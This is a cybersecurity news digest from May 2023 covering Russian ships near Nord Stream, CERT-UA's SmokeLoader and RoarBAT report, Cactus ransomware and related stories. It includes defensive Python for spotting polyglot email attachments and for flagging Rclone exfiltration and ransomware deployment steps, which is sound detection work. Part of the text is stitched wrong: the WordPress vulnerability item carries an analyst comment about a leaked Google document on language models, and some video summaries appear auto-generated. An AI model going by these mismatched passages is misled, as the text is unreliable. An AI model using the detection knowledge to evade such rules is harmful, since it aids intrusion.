Daily Drop (482): Russian ‘Ghost Ships’, RoarBAT Malware Attacks Ukraine, Western Digital leaks, China Limits Data, U.S. military factory blew up, Beijing-Moscow Security Cooperation
05-08-2023
Monday, May 08, 2023 // (IG): BB // Cloak & Dagger // Coffee for Bob
Security News This Week: Russian ‘Ghost Ships’ Identified Near the Nord Stream Blasts
Analyst Comments: The investigation provides significant evidence suggesting the possible involvement of Russian vessels in the Nord Stream pipeline explosions. However, the investigation does not provide conclusive evidence to support these allegations. The exact cause of the blasts is still unknown, and official investigations are ongoing in multiple European countries.
FROM THE MEDIA: Russian ships with underwater operations equipment were present near the sites of the Nord Stream gas pipeline explosions in September 2022, according to a joint investigation by national broadcasters in Denmark, Norway, Sweden, and Finland. The journalists used intercepted radio broadcasts from the ships and satellite images to locate and track their movements. Three ships, including the navy research ship Sibiryakov and a tugboat called SB-123, sailed from Russian naval bases to near the blast sites in June and September 2022. Another Russian vessel, the SS-750, was near the pipelines four days before they were blown up. The investigation raises questions about the ships' unusual behavior but does not conclude what they were doing near the Nord Stream sites.
READ THE STORY: Wired // SkyNews
CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine
Analyst Comments: The phishing campaign distributing SmokeLoader malware highlights the continued use of email as a vector for malware distribution. Polyglot files, which are crafted to be valid as more than one file format at once (for example an archive that also passes as another document type), are increasingly being used by attackers to evade detection. SmokeLoader, whose purpose is to download more capable malware, poses a significant threat to organizations. CERT-UA's report also underscores the increasing use of destructive attacks to cause harm to targeted organizations. Wiper malware capable of destroying data irretrievably poses a grave threat to the integrity and availability of an organization's systems and data.
FROM THE MEDIA: The Computer Emergency Response Team of Ukraine (CERT-UA) has reported a phishing campaign distributing the SmokeLoader malware in the form of a polyglot file via email with invoice-themed lures. The emails are sent from compromised accounts and carry a ZIP archive that contains a decoy document and a JavaScript file. The JavaScript code launches an executable that loads the SmokeLoader malware, which is designed to download or load more capable malware onto infected systems. CERT-UA linked the campaign to UAC-0006, which it characterized as a financially motivated operation seeking to steal credentials and transfer funds without authorization. CERT-UA also revealed a new batch-script wiper called RoarBAT, used against an unnamed state organization, which recursively searches for files with specific extensions and deletes them irretrievably.
READ THE STORY: THN
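The CERT-UA report above describes a ZIP archive (decoy document plus a JavaScript file) delivered as a polyglot. The following Python, added here as an illustration and not code from CERT-UA or the article, shows how a mail gateway can catch that combination: a ZIP reader locates the archive from its trailer, so a file can carry another format's header and still open as a ZIP. The sample attachment, the format magics, and the extension lists are constructed for this example.

```python
import io
import os
import zipfile

# Leading bytes of formats a ZIP payload is commonly hidden behind.  A ZIP
# reader locates the archive from its *end* (the End of Central Directory
# record), so any header can be prepended and the file stays a valid ZIP.
LEADING_MAGICS = {
    b"PK\x03\x04": "zip",
    b"%PDF": "pdf",
    b"GIF8": "gif",
    b"\x89PNG": "png",
    b"\xff\xd8\xff": "jpeg",
}

# Script types a mail gateway should never let through inside an invoice archive.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".bat", ".cmd", ".ps1"}
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt"}


def leading_format(data):
    """Name the format the first bytes claim to be, or 'unknown'."""
    for magic, name in LEADING_MAGICS.items():
        if data.startswith(magic):
            return name
    return "unknown"


def analyze_attachment(data):
    """Classify a mail attachment: 'clean', 'suspicious' (polyglot without
    scripts) or 'quarantine' (script files inside the archive)."""
    report = {"leading_format": leading_format(data), "is_zip": False,
              "polyglot": False, "scripts": [], "decoys": [], "verdict": "clean"}
    try:
        names = zipfile.ZipFile(io.BytesIO(data)).namelist()
    except zipfile.BadZipFile:
        return report          # not an archive at all: nothing more to say
    report["is_zip"] = True
    # Header says one format, trailer says ZIP: that is the polyglot signal.
    report["polyglot"] = report["leading_format"] != "zip"
    for name in names:
        ext = os.path.splitext(name)[1].lower()
        if ext in SCRIPT_EXTENSIONS:
            report["scripts"].append(name)
        elif ext in DECOY_EXTENSIONS:
            report["decoys"].append(name)
    if report["scripts"]:
        report["verdict"] = "quarantine"
    elif report["polyglot"]:
        report["verdict"] = "suspicious"
    return report


def build_sample_polyglot():
    """Constructed sample (not a real lure): a PDF header prepended to a ZIP
    that holds a decoy 'invoice' and a harmless placeholder .js file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("invoice_0508.pdf", b"%PDF-1.4 decoy document")
        zf.writestr("invoice_0508.js", b"// placeholder script body\n")
    return b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n" + buf.getvalue()


if __name__ == "__main__":
    print(analyze_attachment(build_sample_polyglot()))
```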
BlackCat ransomware gang claims major cyber attack on Western Digital, leaks stolen data
Analyst Comments: The cyberattack on Western Digital highlights the growing threat of ransomware attacks, which can result in data theft, system disruption, and significant financial losses for organizations. The BlackCat ransomware gang's involvement in the attack, along with its claims of stealing confidential company data, poses a significant risk to Western Digital and its customers. The threat actors' ability to infiltrate the company's internal systems and steal data underscores the importance of robust cybersecurity measures and the need for organizations to be vigilant in safeguarding their networks against cyber threats. The post by the BlackCat ransomware gang, which included screenshots of internal emails and video conferences, highlights the potential reputational damage that can result from such cyberattacks, as well as the risks posed by the public exposure of sensitive information.
FROM THE MEDIA: California-based data storage device maker Western Digital suffered a cyberattack on 26 March that resulted in threat actors accessing its internal systems and stealing data. The notorious BlackCat ransomware gang has claimed responsibility for the attack and published the company's name on its data leak site. The gang posted screenshots of video conferences and internal emails circulated within the company, including emails in which officials discussed how to respond to the cyberattack. The post also includes a note for the company in which the threat actors threaten to leak the stolen data periodically until they lose "interest" and then put it up for sale on the dark web. The post suggests that the threat actors are in possession of confidential company data such as code-signing certificates, firmware, and personal information of Western Digital customers. Western Digital has yet to respond to the threat actors' claims or confirm whether any ransom was demanded by the group.
READ THE STORY: Teiss
China Limits Data After US Research Spurred Alarm
Analyst Comments: Beijing's restrictions on foreign access to Chinese data sources are not surprising given its broader move to tighten its grip on sensitive data. However, the move will make it harder for think tanks, research houses, and consultancies to analyze what is happening in China, exacerbating tensions between China and the US. Restrictions on data access are also likely to have knock-on effects on investment and transparency in the country.
FROM THE MEDIA: Beijing has curtailed foreign access to Chinese data sources at least partially due to concerns over reports from US-based research institutions based on publicly available data. Senior officials in Beijing grew alarmed by reports from American think tanks such as the Center for Security and Emerging Technology at Georgetown University and the Center for a New American Security, which focused on sensitive issues such as collaboration between the military and private organizations. The clampdown coincided with a broader tightening of controls on data in China and a crackdown on foreign consultancies. Access to sensitive information such as patents and statistics was restricted from overseas, according to the Cyberspace Administration of China, the country's powerful internet overseer.
READ THE STORY: Bloomberg
China lands mysterious reusable spacecraft after a 276-day trek
Analyst Comments: This Asia in Brief roundup covers a wide range of topics, including space technology, smartphones, crypto, chatbots, patents, agriculture, and investments. The news items offer a glimpse of the current economic, technological, and geopolitical landscape in Asia, with varying levels of detail and impact. Some items highlight major developments, such as the return of China's reusable spacecraft and Dyson's battery plant investment, while others touch on more niche or regional issues, such as the buffalo semen loss and India's patent reform. The news items collectively suggest that Asia remains a hotbed of innovation, competition, and challenges, as countries and companies strive to navigate a complex and dynamic environment shaped by global and local trends.
FROM THE MEDIA: Chinese state media announced on Monday the successful return to Earth of a reusable spacecraft after 276 days in orbit. While the specifics of the mission are undisclosed, the spacecraft is thought to be a spaceplane capable of carrying up to six crew. This comes as China seeks to gain capabilities in space and rival the USA’s X-37 spaceplane, which is the most capable spaceplane currently in service. Meanwhile, smartphone sales have slumped in India and China. Chinese sales fell by 11.8% year on year in Q1 2023, while India’s market saw a 16% YoY decline. However, the smartphones purchased were more expensive and capable, with the average selling price reaching an all-time high in India of USD 265 and 5G smartphone share rising from 31% to 45%.
READ THE STORY: The Register
The Data Broker That Targeted Abortion Clinics Landed a US Military Contract
Analyst Comments: SafeGraph's contract with the US Air Force is a significant expansion of its business into the military and national security domains. While the company has previously worked with government agencies, this is the first publicly reported relationship between SafeGraph and the US military. The company's ability to provide data on sensitive locations and adversary state-owned enterprises raises questions about the potential use of its data in military operations and intelligence gathering. SafeGraph's data has historically been used by marketers and hedge funds, and its entry into the military market raises ethical concerns about the use of such data in the context of warfare. The company's ties to In-Q-Tel, a CIA-backed venture capital firm, further complicate these concerns. It remains to be seen how SafeGraph's relationship with the US Air Force will develop, but the potential implications for the use of location data in military operations are significant.
FROM THE MEDIA: SafeGraph, a data broker that previously sold location data related to abortion clinic visits, has signed a contract with the US Air Force. Under the $74,888 "Phase 1" contract with AFWERX, the "innovation wing" of the Air Force, SafeGraph has agreed to provide information about "sensitive places" and "adversary state-owned enterprises" around the world, which the military can use for "analyzing human activity for landing zone selection." The records show that SafeGraph's data can help identify hospitals, schools, houses of worship, and other locations to "help avoid collateral damage." The company also claims that it can provide data on locations of value to China's Belt and Road Initiative, as well as locations of adversary state-owned enterprises to support "intelligence preparation of the battlespace."
READ THE STORY: Wired
The U.S. military relies on one Louisiana factory. It blew up
Analyst Comments: The report highlights the risks associated with America's reliance on a single source for vital components, which is particularly problematic when it comes to producing munitions for military use. The consolidation of defense suppliers, resulting in fewer major arms suppliers and fewer lower-tier suppliers, has led to the emergence of the “single source” problem. Although the Pentagon is aware of the problem, it does not track vulnerabilities down the supply chain, which can lead to unnoticed failures for months. The Defense Department's plan to spend over $207 million to bring the production of materials back to the U.S. is a step towards reducing supply chain risks.
FROM THE MEDIA: A black powder mill explosion in June 2021 destroyed all production of the single vital component needed to produce bullets, mortar shells, artillery rounds, and Tomahawk missiles. Black powder, the original form of gunpowder, is used in small quantities in munitions to ignite more powerful explosives, and there is no substitute for it. With a limited sales volume and thin profits, only one production facility is operational in North America, which makes the military vulnerable to the “single source” problem. Consolidation of defense industrial base suppliers has left many lower-tier firms as the sole makers of vital parts. The Pentagon does not track vulnerabilities down the supply chain, so failures can go unnoticed for months by prime contractors and the Pentagon itself. The Defense Department has identified 27 critical chemicals sourced from countries considered adversaries of the U.S. and expects to spend more than $207 million to bring production of materials back to the U.S. as soon as possible.
READ THE STORY: Modern Diplomacy
What Is So Special about Beijing-Moscow Security Cooperation
Analyst Comments: The article provides an insightful analysis of the evolving security cooperation between Russia and China, highlighting some important aspects that are often overlooked in the Western media. The author makes a compelling case for the principles that guide this cooperation and argues that it has the potential to contribute to global security in a meaningful way.
FROM THE MEDIA: Chinese Defense Minister Li Shangfu's visit to Russia has brought the focus on the ongoing security cooperation between Moscow and Beijing. While the West remains suspicious of the security dimension of Russia-China cooperation, the two nations are moving towards a new model of cooperation that is based on the principles of sovereignty, flexibility, balance of interests, non-targeting of third countries, and a diverse combination of bilateral and multilateral formats. The cooperation on global public goods should be as open as possible to other international actors, and there is a need for more intense coordination between the two nations.
READ THE STORY: Modern Diplomacy
Revolutionizing Electronic Warfare: The Power Of Cognitive Electronic Warfare Systems
Analyst Comments: The article provides a comprehensive overview of the global cognitive electronic warfare system market. It highlights the key factors that are expected to drive or hinder the growth of the market during the forecast period. The article also identifies the top companies operating in the market. However, the article lacks specific data on the size of the market and the expected growth rate during the forecast period.
FROM THE MEDIA: The global cognitive electronic warfare system market is expected to grow during the forecast period of 2023-2032 due to the increasing demand for artificial intelligence in the military and the improved situational awareness that cognitive electronic warfare systems provide. The market is segmented based on capability and platform, with the airborne platform being the most popular due to its effective implementation in aircraft, fighter jets, and unmanned aerial vehicles (UAVs). However, the high deployment cost of cognitive electronic warfare acts as a restraint on the growth of the electronic warfare market.
READ THE STORY: MENAFN
DEF CON to set thousands of hackers loose on LLMs
Analyst Comments: The DEF CON AI Village's move to invite hackers to test the security and vulnerabilities of language models is a proactive step that can help identify the weaknesses of AI models before they are used to cause damage. It is a crucial step toward ensuring that these models are secure and bias-free. The event will encourage more people to learn how to red team and assess these models, which can lead to a better understanding of AI. The involvement of the White House Office of Science, Technology, and Policy; America's National Science Foundation's Computer and Information Science and Engineering (CISE) Directorate; and the Congressional AI Caucus shows that the government is taking AI security seriously.
FROM THE MEDIA: DEF CON AI Village is inviting hackers to find bugs and biases in large language models (LLMs) created by companies such as OpenAI, Google, and Anthropic, among others. The event, which will be the largest-ever red teaming exercise for any group of AI models, is set to host thousands of people, including hundreds of students from overlooked communities, all of whom will find flaws in LLMs used by chatbots and generative AI. The event will run from August 10-13 in Las Vegas, and hackers will have access to laptops and timed access to LLMs from various vendors. They will also have access to an evaluation platform developed by Scale AI. The announcement of the event comes as US Vice President Kamala Harris and senior Biden administration officials met with the bosses of OpenAI, Anthropic, Microsoft, and Google to discuss the risks AI poses to individuals and national security.
READ THE STORY: The Register
New Cactus ransomware encrypts itself to evade antivirus
Analyst Comments: The emergence of Cactus ransomware is concerning, particularly as it is targeting large commercial entities. This suggests that the threat actor behind Cactus is well-resourced and may be looking for significant payouts from its victims. What is particularly worrying is that the use of encryption to protect the ransomware binary suggests that the threat actor is evolving its tactics to avoid detection by security software. This will make it even harder for victims to defend against such attacks. Cactus ransomware also steals data from victims, adding to the pressure to pay the ransom. While there is no public information about the ransoms that Cactus demands from its victims, sources suggest that they are in the millions. It is important for organizations to take steps to protect themselves from such attacks, including ensuring that VPN appliances are up to date and monitoring the network for large data exfiltration tasks.
FROM THE MEDIA: A new ransomware operation called Cactus has been exploiting vulnerabilities in VPN appliances to gain initial access to the networks of large commercial entities. According to corporate investigation and risk consulting firm Kroll, the new threat actor pivots from a VPN server, using a VPN service account, into the victim's network. What sets Cactus apart from other ransomware operations is its use of encryption to protect the ransomware binary. The actor uses a batch script to obtain the encryptor binary using 7-Zip, with the entire process aimed at preventing detection. In addition, the threat actor also steals data from victims, using the Rclone tool to transfer files straight to cloud storage. After exfiltrating data, the hackers use a PowerShell script called TotalExec to automate the deployment of the encryption process. Kroll's research shows that Cactus has used a modified variant of the open-source PSnmap tool, a PowerShell equivalent of the Nmap network scanner, to conduct deeper reconnaissance.
READ THE STORY: Bleeping Computer
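The analyst comment above recommends monitoring for large exfiltration tasks; the Kroll findings name the stages worth watching (7-Zip run from a batch script, Rclone copying to cloud storage, the PSnmap scanner, the TotalExec deployment script). The Python below, added here and not code from Kroll or BleepingComputer, runs one rule per stage over constructed process-creation events and escalates when several stages chain on the same host and account within a time window. The events, file paths, account names, remote name and the six-hour window are all assumptions made for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (not real telemetry), shaped like an
# EDR or Sysmon feed: when, where, who, parent process, image, command line.
SAMPLE_EVENTS = [
    {"ts": "2023-05-01T02:10:00", "host": "FS01", "user": "CORP\\svc_vpn",
     "parent": "cmd.exe", "image": "7z.exe",
     "cmdline": "7z.exe x C:\\Users\\Public\\pkg.7z -oC:\\Users\\Public -y"},
    {"ts": "2023-05-01T02:20:00", "host": "FS01", "user": "CORP\\svc_vpn",
     "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Users\\Public\\psnmap.ps1"},
    {"ts": "2023-05-01T03:05:00", "host": "FS01", "user": "CORP\\svc_vpn",
     "parent": "cmd.exe", "image": "rclone.exe",
     "cmdline": "rclone.exe copy D:\\Finance remote:archive --transfers 16"},
    {"ts": "2023-05-01T03:40:00", "host": "FS01", "user": "CORP\\svc_vpn",
     "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Users\\Public\\TotalExec.ps1"},
    # Benign-looking extraction by a normal user: one stage only.
    {"ts": "2023-05-01T09:00:00", "host": "WS22", "user": "CORP\\alice",
     "parent": "cmd.exe", "image": "7z.exe",
     "cmdline": "7z.exe x photos.7z -oC:\\Users\\alice\\Pictures"},
]

# One rule per stage named in the Kroll reporting.  Script file names and the
# rclone remote are assumptions for this example, not indicators from the page.
RULES = [
    ("archive_extract_from_script", lambda e: e["image"].lower() == "7z.exe"
        and e["parent"].lower() in ("cmd.exe", "wscript.exe")
        and re.search(r"\bx\b", e["cmdline"]) is not None),
    ("rclone_to_remote", lambda e: e["image"].lower() == "rclone.exe"
        and re.search(r"\b(copy|sync|move)\b\s+\S+\s+\w+:", e["cmdline"]) is not None),
    ("powershell_net_scan", lambda e: e["image"].lower() == "powershell.exe"
        and "psnmap" in e["cmdline"].lower()),
    ("powershell_mass_deploy", lambda e: e["image"].lower() == "powershell.exe"
        and "totalexec" in e["cmdline"].lower()),
]


def match_rules(event):
    """Names of every rule the event satisfies (usually zero or one)."""
    return [name for name, pred in RULES if pred(event)]


def triage(events, window=timedelta(hours=6)):
    """Group rule hits per (host, user) and grade them: one stage alone is
    'low', exfiltration or mass deployment alone is 'high', and two or more
    distinct stages inside the window is 'critical'."""
    hits = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        names = match_rules(e)
        if names:
            hits.setdefault((e["host"], e["user"]), []).append(
                (datetime.fromisoformat(e["ts"]), names))
    report = {}
    for key, seq in hits.items():
        stages = []
        for _, names in seq:
            for n in names:
                if n not in stages:
                    stages.append(n)          # keep first-seen order
        span = seq[-1][0] - seq[0][0]
        if len(stages) >= 2 and span <= window:
            severity = "critical"
        elif {"rclone_to_remote", "powershell_mass_deploy"} & set(stages):
            severity = "high"
        else:
            severity = "low"
        report[key] = {"stages": stages, "severity": severity,
                       "span_minutes": int(span.total_seconds() // 60)}
    return report


if __name__ == "__main__":
    for key, finding in triage(SAMPLE_EVENTS).items():
        print(key, finding)
```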
Meta Is Trying to Push Attackers to the Brink
Analyst Comments: The increasing use of multiple platforms by attackers to distribute malware infrastructure highlights the need for companies to be more vigilant and proactive in their security measures. By distributing their activities across multiple platforms, attackers can make it harder for companies to detect their malicious activities. However, Meta's new tools and resources for business users are a step in the right direction in protecting businesses against these evolving threats. It is also commendable that the company is sharing information with other tech companies and law enforcement to create a more coordinated and effective response to these attacks.
FROM THE MEDIA: Meta, the parent company of Facebook, has reported that attackers are increasingly using multiple platforms to distribute their malware infrastructure in an effort to make it more difficult for tech companies to detect their activities. As a response, Meta is launching new tools and resources to provide additional protection for business users, such as new controls for business accounts and a step-by-step tool to help them flag and remove malware on their enterprise devices. The company has also identified a new malware strain called NodeStealer, which targeted Windows browsers to record victims' usernames and passwords, steal cookies, and use the data to compromise Facebook accounts, Gmail, and Outlook accounts. Meta attributes this campaign to Vietnamese actors and says it quickly began submitting takedown requests to hosting providers, domain registrars, and other application services that the actor was using for its activity and malware distribution.
READ THE STORY: Wired
New Vulnerability in Popular WordPress Plugin Exposes Over 2 Million Sites to Cyberattacks
Analyst Comments: The leaked document offers an interesting perspective on the current state of language model development and the role of open-source models. While the document is only the opinion of a Google employee, it raises important points about the limitations of large models and the advantages of open-source development. The document's arguments are well-supported and could serve as a starting point for further discussion and analysis of the open-source LLM landscape.
FROM THE MEDIA: The discovery of the CVE-2023-30777 vulnerability in the Advanced Custom Fields (ACF) plugin for WordPress highlights the need for timely software updates and vigilant user education to prevent social engineering attacks. As the plugin has a broad user base, it's crucial to update to the latest version to protect against this vulnerability. Organizations should also maintain updated antivirus and antimalware software to provide additional layers of protection. Website owners should also consider using web application firewalls (WAFs) to block malicious traffic and apply appropriate permissions and access controls to minimize the impact of an attack.
READ THE STORY: THN
Foxconn Founder Vows to 'Preserve Peace' With China if Elected Taiwan President
Analyst Comments: The statement by Terry Gou shows that he aims to improve relations between Taiwan and China, which have been severely strained under President Tsai Ing-wen's leadership. However, Gou's perceived coziness with Beijing's leadership raises concerns about his loyalty to Taiwan's sovereignty. It remains to be seen how Gou's candidacy will affect the upcoming presidential election in Taiwan, as he faces a challenging race against the candidate of the incumbent DPP and other potential candidates.
FROM THE MEDIA: Terry Gou, the billionaire founder of Foxconn and a key supplier of Apple's iPhones, announced in April 2022 that he plans to seek the presidential nomination of Taiwan's China-friendly opposition Kuomintang party. During his first-ever rally in Taiwan's southern city of Kaohsiung, Gou vowed that if he is elected president of Taiwan in January 2024, he can "preserve peace" between the democratic self-ruled island and China. Gou urged his supporters to let him preserve peace, adding that he can "do better than Tsai Ing-wen, or William Lai," the current Taiwanese vice president who has been nominated as the DPP's candidate. However, critics are concerned about Gou's perceived coziness with Beijing's leadership, given his massive factories built in China.
READ THE STORY: VOA
The NSA’s research chief on emerging tech — including ‘beyond belief’ leaps in AI
Analyst Comments: The article provides insights into the work of the NSA's Research Directorate and its focus on staying operationally relevant. Herrera's comments on emerging technologies such as AI and quantum computing highlight both their potential and potential risks, particularly in relation to security.
FROM THE MEDIA: Gilbert Herrera, who spent almost four decades at Sandia National Laboratories, was appointed in 2021 as the head of the National Security Agency's Research Directorate. In an interview with The Record, he discussed the role of the directorate, its emphasis on being operationally relevant, and the outlook for emerging technologies such as artificial intelligence and quantum computing. Herrera highlighted the need to balance today's problems with those of tomorrow and the future, as well as the importance of integrating security into new technologies such as AI.
READ THE STORY: The Record
Items of interest
Neuberger: Counter Ransomware Initiative focused on ‘expanding the tent,’ with Jordan, Costa Rica, and Colombia joining
Analyst Comments: The ongoing debate around banning ransomware payments underscores the challenge of addressing the growing threat of ransomware attacks. While ransom payments can incentivize attackers to continue their activities, banning them would leave organizations with few options for recovering their data and systems. Moreover, many organizations are likely to find a way around the ban and pay the ransom anyway, creating additional legal and logistical issues. Ultimately, the debate highlights the need for a comprehensive, multi-pronged approach to tackling the ransomware threat, including measures to improve cybersecurity, disrupt criminal networks, and strengthen international cooperation.
FROM THE MEDIA: The U.S. Counter Ransomware Initiative is grappling with the question of whether ransomware payments should be banned, with select waivers available for special situations. White House Deputy National Security Adviser Anne Neuberger said ransomware payment bans have been discussed among members of the initiative. There were over 6,500 ransomware attacks across the globe between 2020 and 2022, prompting difficult discussions about ways to disrupt the ecosystem. Although several U.S. states have banned local government entities from paying ransoms connected to attacks, the bans have so far done little to stop gangs from targeting them. Cybersecurity experts, and even the FBI, have repeatedly come out against the idea of banning payments, noting that it would only further harm victims.
READ THE STORY: The Record
Exposing Modern-Day Scammers | Brett Johnson (Video)
FROM THE MEDIA: The video is a collection of disjointed and fragmented sentences that appear to be excerpts from various conversations and interviews with Brett Johnson, a former cybercriminal who was once on the FBI's most wanted list. The topics discussed range from scams, criminal activities, addiction, and family struggles to prison experiences. Brett Johnson also talks about his book, "Bailout: An Insider's Account of Bank Failures and Rescues," and his podcast, in which he interviews law enforcement officials and former criminals.
FBI's Most Wanted Con Artist Explains The Art of Being a Snitch (Video)
FROM THE MEDIA: The podcast covers various topics, including the speaker's personal life, his experience as a con artist, being a snitch, and China's tech industry. Matt Cox talks about his arrest and prison sentence, getting involved in commercials, and working out. He also discusses politics, teachers' salaries, and his friend's extensive knowledge of the drug trade. The conversation jumps around a lot and lacks coherence.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.